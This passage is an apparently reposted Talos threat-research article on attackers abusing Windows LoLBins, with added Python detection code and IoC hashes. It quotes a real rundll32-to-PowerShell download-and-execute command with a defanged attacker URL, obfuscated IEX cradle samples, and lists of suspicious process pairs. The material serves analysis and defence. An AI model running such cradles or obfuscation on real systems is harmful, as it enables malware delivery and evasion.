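COMSPEC = r"C:\Windows\System32\cmd.exe"     # assumed default value of $Env:COMSpec
MDR_VARIABLE = "MaximumDriveCount"            # assumed only match for (gv '*mdr*').Name

# $env:ComSpec[4,15,25]   and   (gv '*mdr*').Name[3,11,2]   (case-insensitive, spaces tolerated)
COMSPEC_RE = re.compile(r"\$env:comspec\[([\d,\s]+)\]", re.I)
GV_RE = re.compile(r'''\(\s*gv\s+['"]?\*mdr\*['"]?\s*\)\.name\[([\d,\s]+)\]''', re.I)


def pick(source: str, index_list: str) -> str:
    """Emulate PowerShell's zero-based multi-index selection: 'abc'[2,0] -> 'ca'."""
    return "".join(source[int(i)] for i in index_list.split(","))


def resolve_hidden_iex(snippet: str) -> str:
    """Replace each index trick with the literal it evaluates to, leaving the rest intact."""
    out = COMSPEC_RE.sub(lambda m: "'" + pick(COMSPEC, m.group(1)) + "'", snippet)
    out = GV_RE.sub(lambda m: "'" + pick(MDR_VARIABLE, m.group(1)) + "'", out)
    return out


def hides_iex(snippet: str) -> bool:
    """True when an index trick in the snippet resolves to the string 'iex'."""
    return "'iex'" in resolve_hidden_iex(snippet).lower()


# Constructed snippets in the shape Invoke-Obfuscation emits (the -Join'' glues the characters)
SAMPLE_1 = ".($env:ComSpec[4,15,25]-Join'') (New-Object Net.WebClient).DownloadString('http://127.0.0.1/s')"
SAMPLE_2 = "&((gv '*mdr*').Name[3,11,2]-Join'') $payload"

if __name__ == "__main__":
    for s in (SAMPLE_1, SAMPLE_2):
        print(resolve_hidden_iex(s))
```

After resolution the first snippet reads .('iex'-Join'') (New-Object ...), which a plain regex for IEX followed by a download cradle will catch; the same approach extends to any other predictable string Invoke-Obfuscation indexes into (the names of environment variables and .NET type names are the usual ones), as long as the value on the victim is known or can be assumed.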
The downloaded PowerShell scripts contains the functionality to disable Windows Defender, Malwarebytes and Sophos anti-malware software, to install modified XMRig cryptocurrency payload and download modules with the intention to steal user credentials from memory and use the credentials to attempt to spread laterally by passing the hash (Invoke-TheHash) through SMB or WMI.
Deobfuscated crypto-miner loader
Case 3: Hiding Cobalt Strike in network traffic
Our final case study shows the activities of a more advanced actor. The actor uses a Cobalt Strike beacon for post-exploitation activities, with a PowerShell stager taken from the Cobalt Strike framework.
Telemetry shows this attack being launched by abusing rundll32.exe, with a command line that invokes JScript code to download a web page and launch the initial PowerShell stager.
rundll32.exe javascript:\..\mshtml,RunHTMLApplication ;document.write();new%20ActiveXObject(WScript.Shell).Run(powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('hxxps://stjohnplece.co/lll/webax.js');
The first PowerShell stage, webax.js, despite its misleading filename extension, decompresses the second-stage PowerShell code, which loads the first shellcode stage into memory and creates a specific request to download what appears to be the standard jQuery JavaScript library.
Cobalt Strike PowerShell stager
The shellcode creates an HTTP GET request to the IP address 134.209.176.24, but with header fields indicating that the requested host is code.jquery.com, the legitimate host serving jQuery. This technique appears to successfully bypass some automated execution environments, whose analysis results show the request going to the legitimate host rather than to the malicious IP address.
HTTP header with the spoofed host field
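A proxy or network sensor that records both the destination IP and the Host header can catch this directly: the Host value claims a site whose known address ranges do not include the destination. The detection below is an added example for this page (not Talos code and not from the original post). It runs over constructed proxy log lines in a simple whitespace-separated format and compares each Host header against an allowlist of expected ranges; the allowlist uses the TEST-NET-3 range as a placeholder and is an assumption, since in production it would be populated from passive DNS or the proxy's own resolution. The destination 134.209.176.24 in the second sample line is the address reported in the article.

```python
import ipaddress

# Constructed allowlist of where traffic for a given Host value is expected to land.
# Assumption for the example: 203.0.113.0/24 is a placeholder, not jQuery's real CDN.
EXPECTED_HOSTS = {
    "code.jquery.com": ["203.0.113.0/24"],
}

# Constructed proxy log lines: timestamp, source, destination IP, port, Host header, URI.
# The second line reproduces the Host/destination mismatch described in the article.
SAMPLE_LOG = """\
2019-09-10T12:00:01Z 10.0.0.5 203.0.113.10 80 code.jquery.com /jquery-3.3.1.min.js
2019-09-10T12:00:02Z 10.0.0.5 134.209.176.24 80 code.jquery.com /jquery-3.3.1.min.js
2019-09-10T12:00:03Z 10.0.0.7 198.51.100.4 80 www.example.com /index.html
"""


def parse_line(line: str) -> dict:
    ts, src, dst, port, host, uri = line.split(maxsplit=5)
    return {"ts": ts, "src": src, "dst": dst, "port": int(port), "host": host.lower(), "uri": uri}


def host_mismatch(rec: dict) -> bool:
    """True when the Host header names a site whose known ranges exclude the destination IP."""
    nets = EXPECTED_HOSTS.get(rec["host"])
    if nets is None:
        return False            # nothing to compare against; unknown, not necessarily benign
    ip = ipaddress.ip_address(rec["dst"])
    return not any(ip in ipaddress.ip_network(n) for n in nets)


def find_spoofed_hosts(log_text: str):
    """Return the parsed records whose Host header does not fit the destination address."""
    return [rec for rec in map(parse_line, filter(str.strip, log_text.splitlines()))
            if host_mismatch(rec)]


if __name__ == "__main__":
    for rec in find_spoofed_hosts(SAMPLE_LOG):
        print("host mismatch:", rec["host"], "->", rec["dst"], rec["uri"])
```

The same comparison is what the automated environments mentioned above skipped: they trusted the Host header for attribution instead of the address the connection actually went to.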
The downloaded malicious jQuery starts with the actual jQuery code in the first 4,015 bytes, followed by the obfuscated Cobalt Strike beacon, which gets deobfuscated with a static XOR key and loaded into memory using reflective loading techniques.
The beginning and the end of malicious jQuery and Cobalt Strike payload
The malicious jQuery file ends with 1,520 bytes of genuine jQuery code, presumably to evade anti-malware scanners that only inspect the beginning and end of a response.
This technique of hiding a binary payload inside the jQuery library, combined with evading detection of the malicious IP address, shows that we are dealing with a more advanced actor who takes operational security seriously.
Overall, we cannot pinpoint a single type of actor that focuses on using LoLBins. Although LoLBins may once have been used only by more advanced actors, today they are also used by actors employing commodity malicious code such as ransomware or cryptominers.
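A scanner that only looks at the top and tail of a response is exactly what this layout defeats, so one defensive counter is to measure entropy across the whole body rather than at its ends. The code below is an added example for this page (not Talos code and not from the original post): it compares the entropy of the first and last window of a file against the highest-entropy window in between, which is the signature of text wrapped around a packed or XOR-encoded blob. The sample file is constructed, using the 4,015-byte head and 1,520-byte tail sizes reported above around a seeded pseudo-random middle, and the thresholds are assumptions an operator would tune.

```python
import math
import random

HEAD_BYTES = 4015   # genuine jQuery prefix length reported in the article
TAIL_BYTES = 1520   # genuine jQuery suffix length reported in the article


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 8.0 for uniform random data, roughly 4 to 5.5 for JavaScript source."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def analyze_top_and_tail(data: bytes, window: int = 1024,
                         text_max: float = 6.0, packed_min: float = 7.0) -> dict:
    """Compare head and tail entropy with the highest-entropy full window between them."""
    head = shannon_entropy(data[:window])
    tail = shannon_entropy(data[-window:])
    middle = data[window:-window]
    middle_windows = [shannon_entropy(middle[i:i + window])
                      for i in range(0, len(middle) - window + 1, window)]
    max_middle = max(middle_windows, default=0.0)
    return {
        "head_entropy": round(head, 2),
        "tail_entropy": round(tail, 2),
        "max_middle_entropy": round(max_middle, 2),
        # Text-like ends with a packed region in the middle is the pattern we want.
        "flagged": head < text_max and tail < text_max and max_middle > packed_min,
    }


def _constructed_js(n: int) -> bytes:
    """Constructed stand-in for library source: a repeated header line cut to n bytes."""
    line = (b"/*! jQuery v3.3.1 | (c) JS Foundation and other contributors | "
            b"jquery.org/license */\n!function(e,t){\"use strict\";}(window);\n")
    return (line * (n // len(line) + 1))[:n]


def _constructed_sample() -> bytes:
    """Constructed file: JS head, 8 KiB of seeded random bytes standing in for the XOR-ed beacon, JS tail."""
    rng = random.Random(1337)
    hidden = bytes(rng.getrandbits(8) for _ in range(8192))
    return _constructed_js(HEAD_BYTES) + hidden + _constructed_js(TAIL_BYTES)


SAMPLE_MALICIOUS = _constructed_sample()
SAMPLE_CLEAN = _constructed_js(HEAD_BYTES + 8192 + TAIL_BYTES)

if __name__ == "__main__":
    print("constructed malicious:", analyze_top_and_tail(SAMPLE_MALICIOUS))
    print("constructed clean:", analyze_top_and_tail(SAMPLE_CLEAN))
```

Minified JavaScript sits well below 6 bits per byte, while an XOR-encoded PE is close to the entropy of the key-stream it was mixed with, so the gap between the ends and the middle is large enough that the exact window size matters little.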
Detecting and preventing LoLBins abuse
Protecting against the abuse of LoLBins combined with fileless code is difficult for security controls that do not monitor process behavior. The abuse can be detected from the parent-child relationships of launched processes, as well as from anomalous network activity by processes that are not usually associated with network communication.
Organisations are advised to configure their systems for centralized logging, where further analytics can be performed by hunting teams. Since version 5, PowerShell can also be configured to log every executed script block to the Windows event log (Script Block Logging). This allows security teams to read obfuscated code that must be deobfuscated before it runs: the execution of the deobfuscated code is visible in the Windows event logs.
However, the best possible protection is to deny execution of LoLBins using mechanisms such as Windows Defender Application Control. Microsoft created a policy block file, which will block execution of LoLBins not required on protected systems.
Unfortunately, blocking all LoLBins is not possible in most environments since they are also required by legitimate processes.
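The three detection angles above (parent-child relationships, unexpected network activity by a LoLBin, and script block logs) can be expressed as a handful of rules over centralized telemetry. The hunting script below is an added example for this page, not Talos code and not from the original post. It evaluates a list of events shaped like Sysmon process-creation (1) and network-connection (3) records plus PowerShell script block (4104) records; the event dictionaries are constructed approximations of those records, and the suspicious parent-child pairs and the list of LoLBins assumed to have no legitimate network use are environment-specific assumptions to be tuned, not universal facts. The rundll32 command line and the destination address come from the case above; the stager URL is a placeholder.

```python
import ntpath
import re

# Parent/child pairs that are rarely legitimate (environment-specific assumptions).
SUSPICIOUS_PARENT_CHILD = {
    ("rundll32.exe", "powershell.exe"),
    ("mshta.exe", "powershell.exe"),
    ("winword.exe", "powershell.exe"),
    ("wmiprvse.exe", "powershell.exe"),
}
# LoLBins assumed, for this example environment, to have no reason to open network connections.
LOLBINS_NO_NETWORK = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "msbuild.exe", "installutil.exe"}
# Character-index tricks such as $env:ComSpec[4,15,25]-join'' inside a logged script block.
_INDEX_JOIN = re.compile(r"\[\s*\d+(\s*,\s*\d+)+\s*\]\s*-join\s*''", re.I)


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def evaluate(event: dict):
    """Return the list of rule names an event triggers (empty for benign events)."""
    rules = []
    eid = event["id"]
    if eid == 1:                                   # process creation
        image, parent = _base(event["image"]), _base(event.get("parent", ""))
        if (parent, image) in SUSPICIOUS_PARENT_CHILD:
            rules.append("parent_child")
        if image == "rundll32.exe" and "javascript:" in event.get("cmdline", "").lower():
            rules.append("rundll32_javascript")
    elif eid == 3:                                 # network connection
        if _base(event["image"]) in LOLBINS_NO_NETWORK:
            rules.append("lolbin_network")
    elif eid == 4104:                              # PowerShell script block logging
        if _INDEX_JOIN.search(event.get("script", "")):
            rules.append("scriptblock_index_join")
    return rules


def hunt(events):
    """Run every rule over every event; returns (rule, event) pairs in event order."""
    return [(rule, ev) for ev in events for rule in evaluate(ev)]


# Constructed events approximating Sysmon 1/3 and PowerShell 4104 records for the
# rundll32 -> PowerShell chain described in the article; values are illustrative.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\rundll32.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe javascript:\..\mshtml,RunHTMLApplication ;document.write();"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\rundll32.exe",
     "cmdline": "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient)"
                ".DownloadString('hxxps://example.invalid/stager.js')"},  # placeholder URL
    {"id": 3, "image": r"C:\Windows\System32\rundll32.exe", "dst": "134.209.176.24", "dport": 80},
    {"id": 4104, "script": "&($env:ComSpec[4,15,25]-join'') $stage2"},
    {"id": 1, "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe"},
    {"id": 3, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "dst": "198.51.100.7", "dport": 443},
]

if __name__ == "__main__":
    for rule, ev in hunt(SAMPLE_EVENTS):
        print(rule, "<-", ev.get("image", ev.get("script")))
```

None of these rules needs a signature for the payload itself; they key on how the binaries are used, which is the only stable property when the LoLBin cannot be blocked outright.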
Conclusion
Our research shows that many types of actors employ various techniques to use LoLBins in their activities, from commodity malware to more targeted attacks. However, the overall proportion of malicious usage is very low (below 0.2 percent), which is not enough to justify blocking all invocations of LoLBins.
However, blue team members must keep LoLBins in mind during regular hunting activities. Used successfully, LoLBins let an attacker make their attacks harder to trace or allow their malware to linger longer on the victim machine.
Coverage
It is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.
Additional ways our customers can detect and block these threats are listed below.
Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.
Email Security can block malicious emails sent by threat actors as part of their campaign.
Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.
AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.
Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.
Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.
IoCs
Sodinokibi
dc3de6cff67f4bcb360d9fdd0fd5bd0d6afca0e1518171b8e364bb64c5446bb1
dc788044ba918463ddea34c1128c9f4da56e0778e582ae9abdeb15fdbcc57e80
Xmrig related
4528341b513fb216e06899a24d3560b89636158432ba7a0a118caa992739690e
c4ef0e90f81bac29899070d872e9ddea4531dbb5a18cdae090c19260cb0d4d83
e0ffda3353a17f5c9b7ef1d9c51f7dc1dcece1dfa2bcc8e1c93c27e5dde3b468
3f8d2e37a2bd83073e61ad4fc55536007076ae59a774b5d0c194a2bfab176172
92f0a4e2b7f4fe9d4ea373e63d9b08f4c2f21b2fd6532226c3fd576647efd64a
ebb7d224017d72d9f7462db541ac3dde38d2e7ecebfc9dca52b929373793590
Cobalt strike stager
522b99b5314531af6658e01ab471e1a7e0a5aa3a6ec100671dcfa0a6b0a1f52d
4c1a9ba633f739434cc81f23de9c6c1c12cdeacd985b96404a4c2bae2e54b0f5
f09d5ca3dfc53c1a6b61227646241847c5621b55f72ca9284f85abf5d0f06d35
Source: Hunting for LoLBins, original post from Talos Security, by Vanja Svajcer.
Favorite tweets
Back in EU, where your cup has no name, and your hoodie is for outside... Had an awesome last @DerbyCon. Smile because it happened... Thanks @HackingDave & All.
— Walter.Legowski (@SadProcessor) September 11, 2019
from http://twitter.com/SadProcessor via IFTTT